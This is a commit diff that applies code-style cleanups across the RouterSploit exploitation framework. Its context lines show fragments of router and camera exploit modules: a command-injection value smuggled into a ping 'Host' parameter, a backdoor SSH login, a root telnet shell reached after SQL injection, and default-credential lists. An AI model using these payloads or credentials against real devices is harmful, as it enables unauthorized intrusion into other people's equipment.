Unverified Commit 62b83fb4 by Marcin Bury Committed by GitHub

Improving code quality (#435)

parent 2ee21d01
......@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner,
ScanDelegate
)
__all__ = [
"Device",
"BTLEScanner",
"ScanDelegate",
]
......@@ -120,7 +120,7 @@ class Device(ScanEntry):
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char =c
char = c
break
if char:
......@@ -221,7 +221,7 @@ class Device(ScanEntry):
try:
string = color_blue(repr(data.decode("utf-8")))
except Exception:
stirng = repr(data)
string = repr(data)
except Exception:
pass
......
......@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def _decode_address(self, resp):
addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
return ":".join([addr[i : i + 2] for i in range(0, 12, 2)])
return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])
def _find_or_create(self, addr):
if addr in self.scanned:
......@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if self.mac and dev.addr == self.mac:
break
class ScanDelegate(DefaultDelegate):
def __init__(self, options):
DefaultDelegate.__init__(self)
......
......@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table,
)
import routersploit.core.exploit.utils
from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell
__all__ = [
"Exploit",
"multi",
"mute",
"LockedIterator",
"OptIP",
"OptPort",
"OptInteger",
"OptFloat",
"OptBool",
"OptString",
"OptMAC",
"OptWordlist",
"print_info",
"print_status",
"print_success",
"print_error",
"print_table",
"utils",
"shell",
]
import os
import threading
import time
import concurrent.futures
from future.utils import with_metaclass, iteritems
from itertools import chain
from functools import wraps
from routersploit.core.exploit.printer import (
print_status,
print_error,
thread_output_stream,
)
from routersploit.core.exploit.option import Option
......@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol = "custom"
def run(self):
raise NotImplementedError("You have to define your own 'run' method.")
......@@ -204,5 +201,3 @@ class Protocol:
HTTP = "http"
HTTPS = "https"
SNMP = "snmp"
......@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity = OptBool("true", "Verbosity enabled: true/false")
ssl = OptBool("false", "SSL enabled: true/false")
def http_request(self, method, path, session=requests, **kwargs):
if self.ssl:
url = "https://"
......
......@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
def _windows_shell(self, chan):
......
......@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except:
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_exploit(self, *args, **kwargs):
......
import sys
import time
import binascii
import hashlib
class ApiRosClient(object):
"Routeros api"
"RouterOS API"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
......@@ -17,16 +17,21 @@ class ApiRosClient(object):
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
output = self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
output = self.talk([
"/login",
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
])
return output
def talk(self, words):
if self.writeSentence(words) == 0: return
if self.writeSentence(words) == 0:
return
r = []
while 1:
i = self.readSentence();
if len(i) == 0: continue
i = self.readSentence()
if len(i) == 0:
continue
reply = i[0]
attrs = {}
for w in i[1:]:
......@@ -34,9 +39,10 @@ class ApiRosClient(object):
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs))
if reply == '!done': return r
if reply == '!done':
return r
def writeSentence(self, words):
ret = 0
......@@ -50,7 +56,8 @@ class ApiRosClient(object):
r = []
while 1:
w = self.readWord()
if w == '': return r
if w == '':
return r
r.append(w)
def writeWord(self, w):
......@@ -61,31 +68,30 @@ class ApiRosClient(object):
ret = self.readStr(self.readLen())
return ret
def writeLen(self, l):
if l < 0x80:
self.writeByte((l).to_bytes(1, sys.byteorder))
elif l < 0x4000:
l |= 0x8000
tmp = (l >> 8) & 0xFF
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x200000:
l |= 0xC00000
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x10000000:
l |= 0xE0000000
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
def writeLen(self, length):
if length < 0x80:
self.writeByte((length).to_bytes(1, sys.byteorder))
elif length < 0x4000:
length |= 0x8000
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x200000:
length |= 0xC00000
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x10000000:
length |= 0xE0000000
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
else:
self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self):
c = ord(self.readStr(1))
......@@ -120,24 +126,27 @@ class ApiRosClient(object):
return c
def writeStr(self, str):
n = 0;
n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def writeByte(self, str):
n = 0;
n = 0
while n < len(str):
r = self.sk.send(str[n:])
if r == 0: raise RuntimeError("connection closed by remote end")
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end")
if s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
......@@ -20,7 +20,6 @@
#
##############################################################
import sys
import collections
......
......@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)")
......@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
),
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(23, "Target Telnet port")
......
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def target_function(self, data):
username, password = data.split(":")
def check(self):
response = self.http_request(
method="GET",
......@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if response is None:
return False
if all([x in response.text
for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>',
'var csrfMagicToken =']]):
if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
return True
return False
......
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)")
......@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port = OptPort(8080, "Target HTTP port")
def __init__(self):
config_content = None
self.config_content = None
def run(self):
if self.check():
print_success("Target appears to be vulnerable.")
......@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str += tmp_str[i + half_str_len] + tmp_str[i]
return ret_str
......@@ -42,7 +42,6 @@ class Exploit(TelnetClient):
print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000)
if tn:
self.telnet_interactive(tn)
......
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
......@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk:
print_success(chunk)
except:
except Exception:
print_error("Exploit failed - could not read /proc/kcore")
@mute
......
......@@ -150,7 +150,8 @@ class Exploit(TCPClient):
a, b = item.span()
clean_data += data[tmp_b:a]
tmp_b = b
clean_data += "................................ repeated {} times ................................".format(b-a-64)
repeated = b - a - 64
clean_data += "................................ repeated {} times ................................".format(repeated)
clean_data += data[b:]
print_info(clean_data)
......@@ -268,12 +269,12 @@ class Exploit(TCPClient):
def parse_server_hello(self, data):
version = unpack(">H", data[:2])[0]
print_status("\t\tServer Hello Version: 0x{:x}".format(version))
random = unpack(">" + "B"*32, data[2:34])
random = unpack(">" + "B" * 32, data[2:34])
random_hex = str(binascii.hexlify(bytes(random)), "utf-8")
print_status("\t\tServer Hello random data: {}".format(random_hex))
session_id_length = unpack(">B", data[34:35])[0]
print_status("\t\tServer Hello Session ID length: {}".format(session_id_length))
session_id = unpack(">" + "B"*session_id_length, data[35: 35 + session_id_length])
session_id = unpack(">" + "B" * session_id_length, data[35: 35 + session_id_length])
session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8")
print_status("\t\tServer Hello session id: {}".format(session_id_hex))
......@@ -282,22 +283,21 @@ class Exploit(TCPClient):
print_status("\t\tCertificates length: {}".format(cert_len))
print_status("\t\tData length: {}".format(len(data)))
#contains multiple certs
# contains multiple certs
already_read = 3
cert_counter = 0
while already_read < cert_len:
cert_counter += 1
# get single certificate length
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read:already_read+3])
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read: already_read + 3])
print_status("\t\tCertificate {}".format(cert_counter))
print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len))
certificate_data = data[(already_read + 3): (already_read+3+single_cert_len)]
certificate_data = data[(already_read + 3): (already_read + 3 + single_cert_len)]
cert = x509.load_der_x509_certificate(certificate_data, default_backend())
print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert))
already_read = already_read + single_cert_len + 3
def get_ssl_record(self):
hdr = self.tcp_recv(self.tcp_client, self.SSL_RECORD_HEADER_SIZE)
......
......@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def execute(self, cmd):
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
......@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd = "echo $(({}-1))".format(number)
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
......@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return False # target is not vulnerable
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = self.http_request(
method="GET",
path="/xslt",
......
......@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except:
except Exception:
print_error("Exploit failed - could not decode password")
return
......
......@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
except:
except Exception:
print_error("Connection failed")
return
......@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try:
t = telnetlib.Telnet(self.target, int(self.telnet_port))
t.interact()
except:
except Exception:
print_error("Exploit failed")
else:
print_status("Check if Telnet authentication was set back")
......
......@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file": (sh_name, payload)
}
try:
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
except:
pass
return
......
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if len(res):
try:
b64decode(res[0]) # checking if data is base64 encoded
except:
except Exception:
return False # target is not vulnerable
else:
return False # target is not vulnerable
......
......@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock.send(buf)
response = sock.recv(65535)
sock.close()
except:
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
......
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
class Exploit(UDPClient):
__info__ = {
"name": "D-Link DIR-815 & DIR-850L RCE",
......
......@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
self.credentials = []
......
......@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link DWL-3200AP Password Disclosure",
......
......@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except:
except Exception:
pass
sock.close()
......@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except:
except Exception:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except:
except Exception:
pass
return False # target is not vulnerable
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link Multi HNAP RCE",
......
......@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
print_error("Exploit Failed - SSH Service is down")
return
......@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
print_status("Error with Existing Session. Wait few minutes.")
return
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success("Exploit succeeded")
ssh_interactive(client)
except:
except Exception:
print_error("Exploit failed")
return
......@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
return False # target is not vulnerable
trans = client.get_transport()
......@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
return None # could not verify
try:
trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
except:
except Exception:
return False # target is not vulnerable
return True # target is vulnerable
......
......@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try:
print_status("Waiting for response")
response = sock.recv(1024)
except:
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
......@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try:
response = sock.recv(1024)
except:
except Exception:
return False # target is not vulnerable
if len(response):
......
......@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2": "snort"
}
response = self.http_request(
self.http_request(
method="POST",
path="/cgi-bin/ids.cgi",
headers=headers,
......@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version = res[0][0]
update = int(res[0][1])
if Version(version) <= Version("2.19") and udpate <= 110:
if Version(version) <= Version("2.19") and update <= 110:
return True # target is vulnerable
return False # target is not vulnerable
......@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if response is not None and response.status_code <= 302:
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
"Seems good but check " +
"{}:{} ".format(self.target, self.port) +
"using your browser to verify if authentication is disabled or not."
)
return True
else:
......
......@@ -63,9 +63,9 @@ class Exploit(HTTPClient):
@staticmethod
def decrypt_backup(backup):
key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
l = (len(backup) / 16) * 16
length = (len(backup) / 16) * 16
cipher = AES.new(key, AES.MODE_ECB)
plain = cipher.decrypt(backup[0:l])
plain = cipher.decrypt(backup[0:length])
return plain
@mute
......
import re
from io import StringIO
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
......@@ -57,7 +56,6 @@ class Exploit(FTPClient):
return False
def get_credentials(self):
print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
self.password))
......
......@@ -56,9 +56,9 @@ class Exploit(HTTPClient):
return passwd
def parse(self, data):
l = data.split(b'\r\n')
del l[0]
for item in l:
parts = data.split(b'\r\n')
del parts[0]
for item in parts:
try:
if 'authKey' in item:
authKey = item.split()[1]
......@@ -66,7 +66,7 @@ class Exploit(HTTPClient):
cPskSecret = item.split()[1]
if 'cUsrPIN' in item:
cUsrPIN = item.split()[1]
except:
except Exception:
pass
return authKey, cPskSecret, cUsrPIN
......
......@@ -42,10 +42,9 @@ class Exploit(HTTPClient):
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
url = "{}:{}{}".format(self.target, self.port, path)
try:
response = self.http_request(
method="GET",
......@@ -73,7 +72,7 @@ class Exploit(HTTPClient):
res = res1 + res2
if res[0] != "</textarea>":
return res[0]
except:
except Exception:
pass
return ""
......@@ -85,7 +84,7 @@ class Exploit(HTTPClient):
path="/template.gch",
session=self.session
)
except:
except Exception:
return
# Check for Model Name
......@@ -140,7 +139,7 @@ class Exploit(HTTPClient):
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
except:
except Exception:
pass
return False
......
......@@ -76,7 +76,7 @@ class Exploit(HTTPClient):
def login(self):
credentials = base64.encode("{}:{}".format(self.username, self.password))
url = "/cgi-bin/index.asp?" + credentials
path = "/cgi-bin/index.asp?" + credentials
data = {
"Loginuser": "supervisor",
......
......@@ -20,7 +20,6 @@ class Exploit(BTLEClient):
data = OptString("41424344", "Data (in hex format)")
buffering = OptBool("true", "Buffering enabled: true/false. Results in real time.")
def run(self):
try:
data = bytes.fromhex(self.data)
......
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
......
from base64 import b64encode
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
......
......@@ -18,5 +18,6 @@ def routersploit():
rsf = RoutersploitInterpreter()
rsf.start()
if __name__ == "__main__":
routersploit()
import pytest
from unittest.mock import patch
from threat9_test_bed.scenarios import HttpScenario
from threat9_test_bed.service_mocks import HttpScenarioService, HttpServiceMock
from threat9_test_bed.scenarios import TelnetScenario
from threat9_test_bed.service_mocks.telnet_service_mock import TelnetServiceMock
import routersploit.core.exploit.shell
@pytest.fixture
def target():
with HttpServiceMock("127.0.0.1", 0) as target_:
yield target_
@pytest.fixture(scope="session")
def empty_target():
with HttpScenarioService("127.0.0.1", 0,
......@@ -55,8 +53,8 @@ def timeout_target():
HttpScenario.TIMEOUT) as http_service:
yield http_service
@pytest.fixture
def generic_target():
with TelnetServiceMock("127.0.0.1", 0, TelnetScenario.AUTHORIZED) as telnet_service:
yield telnet_service
from flask import request
from routersploit.modules.creds.cameras.basler.webinterface_http_form_default_creds import Exploit
......
......@@ -8,7 +8,6 @@ def test_check_success(generic_target):
exploit.target = generic_target.host
exploit.port = generic_target.port
assert exploit.check() is False
assert exploit.check_default() is None
assert exploit.run() is None
......@@ -26,7 +26,7 @@ configfile = (
"UserSetSetting.userList.users0.username=Cam_User"
"UserSetSetting.userList.users1.index=0"
"UserSetSetting.userList.users1.password=C0mm0mP4ss"
)
)
def test_check_v1_success(target):
......
......@@ -4,30 +4,29 @@ from routersploit.modules.exploits.cameras.brickcom.users_cgi_creds_disclosure i
response = (
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
""")
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
"""
)
def apply_response(*args, **kwargs):
......
from flask import request, Response
from flask import Response
from base64 import b64decode
from routersploit.modules.exploits.cameras.dlink.dcs_930l_932l_auth_bypass import Exploit
......
......@@ -13,4 +13,3 @@ def test_check_success(target):
assert exploit.check()
assert exploit.run() is None
......@@ -12,37 +12,37 @@ def test_check_success(target):
"<gw_name>DIR-850L</gw_name>"
"<account>"
"<seqno>1</seqno>"
"<max>2</max>"
"<count>1</count>"
"<entry>"
"<uid>USR-</uid>"
"<name>Admin</name>"
"<usrid></usrid>"
"<password>92830535</password>"
"<group>0</group>"
"<description></description>"
"</entry>"
"</account>"
"<group>"
"<seqno></seqno>"
"<max></max>"
"<count>0</count>"
"</group>"
"<session>"
"<captcha>0</captcha>"
"<dummy></dummy>"
"<timeout>180</timeout>"
"<maxsession>128</maxsession>"
"<maxauthorized>16</maxauthorized>"
"</session>"
"</device>"
"</module>"
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<hedwig>"
"<result>OK</result>"
"<node></node>"
"<message>No modules for Hedwig</message>"
"</hedwig>"
" <max>2</max>"
" <count>1</count>"
" <entry>"
" <uid>USR-</uid>"
" <name>Admin</name>"
" <usrid></usrid>"
" <password>92830535</password>"
" <group>0</group>"
" <description></description>"
" </entry>"
" </account>"
" <group>"
" <seqno></seqno>"
" <max></max>"
" <count>0</count>"
" </group>"
" <session>"
" <captcha>0</captcha>"
" <dummy></dummy>"
" <timeout>180</timeout>"
" <maxsession>128</maxsession>"
" <maxauthorized>16</maxauthorized>"
" </session>"
" </device>"
" </module>"
" <?xml version=\"1.0\" encoding=\"utf-8\"?>"
" <hedwig>"
" <result>OK</result>"
" <node></node>"
" <message>No modules for Hedwig</message>"
" </hedwig>"
)
exploit = Exploit()
......
......@@ -4,7 +4,7 @@ from routersploit.modules.exploits.routers.linksys.smartwifi_password_disclosure
def test_check_success(target):
""" Test scenario - successful check """
route_mock= target.get_route_mock("/.htpasswd", methods=["GET"])
route_mock = target.get_route_mock("/.htpasswd", methods=["GET"])
route_mock.return_value = (
'admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/'
)
......
......@@ -7,6 +7,7 @@ from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Ex
mark = ""
first_req = 0
def apply_response1(*args, **kwargs):
global mark, first_req
......@@ -34,7 +35,7 @@ def apply_response_with_waiting(*args, **kwargs):
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
def test_check_success1(mocked_shell, target):
""" Test scenario - successful check without waiting """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
......@@ -52,7 +53,7 @@ def test_check_success(mocked_shell, target):
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
def test_check_success2(mocked_shell, target):
""" Test scenario - successful check with waiting """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
......
......@@ -4,6 +4,7 @@ from routersploit.modules.exploits.routers.multi.rom0 import Exploit
response = b64decode(b"AQEAARlIZGJnYXJlYQAAAAAAAAAYAAAAAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA